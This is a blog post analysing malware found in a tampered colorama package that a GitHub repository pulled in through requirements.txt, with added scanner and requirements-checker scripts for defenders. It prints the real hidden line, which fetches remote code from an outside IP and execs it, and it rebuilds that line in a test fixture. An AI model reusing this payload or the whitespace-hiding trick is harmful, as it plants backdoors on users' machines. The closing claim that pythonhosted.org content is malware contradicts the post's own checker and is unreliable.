Discovering malware in public GitHub repositories
I trust this article finds you in good spirits. Let’s forgo the formalities of introductions and dive straight into the subject at hand.
I was using my laptop today, just the regular messing around with Python and other stuff on my command line, until I saw a weird message saying that there was something wrong with colorama in Python. I didn't care much because I'm used to this stuff, so I just skipped it. A few minutes later I got the same error message, but from a different script I was using. The error message looked like this:
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "C:\Users\demonia\AppData\Local\Programs\Python\Python312\Lib\site-packages\colorama\__init__.py", line 6, in <module>
__version__ = '0.4.3' ;exec(__import__('requests').get('http://144.172.67.49/version').text)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "<string>", line 1
<html>
^
SyntaxError: invalid syntax
The moment I saw this I knew what was going on: I got hacked. But how did it happen? I had no idea, so I started my analysis.
I started by opening C:\Users\demonia\AppData\Local\Programs\Python\Python312\Lib\site-packages\colorama\__init__.py in Visual Studio Code, and I saw nothing! It literally looked like this
Until I noticed the scroll-bar at the bottom of the code editor. I kept scrolling and found code that had been pushed to the far right of the page with spaces so it wouldn't be noticed. It looked just like this
So let's break down the malicious code. The attacker uses Python's __import__ function to import the requests library, sends a GET request to http://144.172.67.49/version, and takes the text attribute of the response object, all of it wrapped in an exec call. The result is that the attacker can run arbitrary Python code fetched from a remote server on the victim machine every single time colorama is imported. Just being imported is enough: you don't have to use colorama anywhere in your code for this to work, because the payload lives in __init__.py, so it executes whether you use the package or not. The traceback above only appeared because the server answered with an HTML page instead of Python code, so exec raised a SyntaxError; as long as the server was serving valid Python, the payload ran silently.
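A defender-side check for exactly this shape of tampering, written as an added example (not code from the original post): it walks a site-packages tree and flags lines that wrap a dynamic import of requests in exec, and lines where a long run of whitespace pushes code past the editor's visible width. The fake packages it writes to a temporary directory are constructed for the demo, and the payload host 192.0.2.1 is an RFC 5737 documentation address, not the server from the post.

```python
"""Scan a site-packages tree for the hidden exec-on-import pattern described above.
Added example, not code from the original post. The packages written by
build_demo_tree() are constructed for the demo."""
import os
import re
import tempfile

# Shape of the payload in the post: exec() wrapping a dynamic __import__ of
# requests whose response body is executed as code.
REMOTE_EXEC = re.compile(r"exec\s*\(\s*__import__\s*\(\s*['\"]requests['\"]")
# A whitespace run this long in the middle of a line serves no formatting
# purpose; its only effect is to scroll the rest of the line off-screen.
HIDDEN_PAD = re.compile(r"\S[ \t]{120,}\S")


def scan_file(path):
    """Return (path, lineno, reason) tuples for suspicious lines in one file."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            if REMOTE_EXEC.search(line):
                findings.append((path, lineno, "exec of remotely fetched code"))
            if HIDDEN_PAD.search(line):
                findings.append((path, lineno, "code hidden behind long whitespace run"))
    return findings


def scan_tree(root):
    """Walk every .py file under root (for example Lib/site-packages) and collect findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".py"):
                findings.extend(scan_file(os.path.join(dirpath, name)))
    return sorted(findings)


def build_demo_tree():
    """Create a fake site-packages with one clean and one trojaned package (constructed)."""
    root = tempfile.mkdtemp(prefix="fake-site-packages-")
    os.makedirs(os.path.join(root, "cleanpkg"))
    with open(os.path.join(root, "cleanpkg", "__init__.py"), "w") as fh:
        fh.write("__version__ = '1.0.0'\n")
    os.makedirs(os.path.join(root, "colorama"))
    # Same construction as the post's line 6: version assignment, then 400 spaces,
    # then the payload on the same line. 192.0.2.1 is a documentation address.
    payload = ";exec(__import__('requests').get('http://192.0.2.1/version').text)"
    with open(os.path.join(root, "colorama", "__init__.py"), "w") as fh:
        fh.write("from .initialise import init\n")
        fh.write("__version__ = '0.4.3'" + " " * 400 + payload + "\n")
    return root


def demo():
    """Build the constructed tree and scan it; returns the findings list."""
    return scan_tree(build_demo_tree())


if __name__ == "__main__":
    for path, lineno, reason in demo():
        print(f"{path}:{lineno}: {reason}")
```

Point scan_tree at your real site-packages directory to check an existing install. The patterns are heuristics for this one technique; the stronger control is to install only from the package index with pip's --require-hashes mode, so a wheel that does not match the expected hash is rejected before anything lands in site-packages.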
I decided to dig into the server hosting the malware. It turned out that the IP address does belong to GalaxyGate, but GalaxyGate is just a VPS provider, nothing crazy about it: they give people servers and those people host whatever content they want on them. What we do know for sure is that one of GalaxyGate's users is hosting this malware.
After all of this I still hadn't figured out where I got infected, so I checked every single repository and project I had installed or run pip inside of, and I noticed something weird. I had recently downloaded https://github.com/maleduque/Valorant-Checker, and checking its requirements.txt file I found this
The moment I saw the version I knew for sure that this was how I got the malware: the colorama version matches the one that had the malware in it. I tried to visit the package that contained the malware, but it seems to have been deleted. I have no idea whether pypihosted or pythonhosted is owned by the person spreading the malware, but it seems not, since the malware got deleted. Maybe someone noticed it? I have no idea.
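The requirements.txt entry is the part of this chain that is easiest to catch before anything gets installed: a normal pin is resolved by the package index, while a direct URL fetches a file from whatever host is named. The checker below is an added example (not code from the original post) that flags index options and direct-URL requirements pointing anywhere other than PyPI's own hosts, plus anything fetched over plain HTTP. The requirements text is constructed, and the exact form of the pypihosted.org line is an assumption based on the post's description.

```python
"""Flag requirements.txt entries that fetch packages from somewhere other than the
real package index. Added example, not code from the original post. The sample
requirements text is constructed."""
from urllib.parse import urlparse

# Hosts that legitimately serve PyPI packages. Anything else is a direct download
# from an arbitrary server and deserves a look before `pip install -r`.
TRUSTED_HOSTS = {"pypi.org", "files.pythonhosted.org"}
URL_OPTIONS = {"-i", "--index-url", "--extra-index-url", "-f", "--find-links"}


def extract_url(line):
    """Return the download URL a requirements line points at, or None for plain pins."""
    parts = line.split()
    head, _, value = parts[0].partition("=")
    if head in URL_OPTIONS:                       # --index-url=URL or --index-url URL
        return value or (parts[1] if len(parts) > 1 else None)
    if line.startswith(("http://", "https://", "git+")):
        return line                               # bare archive or VCS URL
    name, at, rest = line.partition("@")          # PEP 508 direct reference: name @ URL
    if at and "://" in rest:
        return rest.split(";", 1)[0].strip()      # drop an environment marker if present
    return None


def check_requirements(text):
    """Return (lineno, line, reason) for every entry that bypasses the trusted index."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()       # ignore comments and blank lines
        if not line:
            continue
        url = extract_url(line)
        if url is None:
            continue                              # ordinary name==version pin
        host = (urlparse(url).hostname or "").lower()
        if url.startswith("http://"):
            findings.append((lineno, raw, "package fetched over plain HTTP"))
        if host not in TRUSTED_HOSTS:
            findings.append((lineno, raw, f"package fetched from untrusted host {host!r}"))
    return findings


# Constructed sample; the pypihosted.org line mirrors the look-alike host from the post.
SAMPLE_REQUIREMENTS = """\
# constructed sample, not the repository's real file
requests==2.31.0
colorama @ https://pypihosted.org/packages/colorama-0.4.3-py2.py3-none-any.whl
https://files.pythonhosted.org/packages/example/six-1.16.0-py2.py3-none-any.whl
--extra-index-url http://mirror.example.invalid/simple
"""

if __name__ == "__main__":
    for lineno, line, reason in check_requirements(SAMPLE_REQUIREMENTS):
        print(f"line {lineno}: {reason}\n    {line}")
```

Run it over a cloned repository's requirements.txt before installing. A hit is not proof of malware, since projects do pin legitimate wheels by URL, but it is the line to open and read, and a look-alike host such as pypihosted.org is the tell the post describes.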
After all of that there was only one thing left to do: find the other places where this malware is hosted and expose the accounts spreading it. So I did a simple GitHub query searching for pypihosted.org and ended up with 9 results.
So here's a list of the repos that contained the malware before. If you downloaded any of those repos, or any other repos from the users maintaining them, please make sure to check your system.
The point of this article: always check the repo before downloading anything, and never trust content hosted on pypihosted.org or pythonhosted.org; either it's hosted on PyPI or it's malware. Shoutout to my boy flexeando for hosting the malware though; it's really smart of him to follow himself, and two accounts mentioning him in their bio, from the account he's using to spread the malware.
I hope you enjoyed this article anyway. Have a great day and stay safe!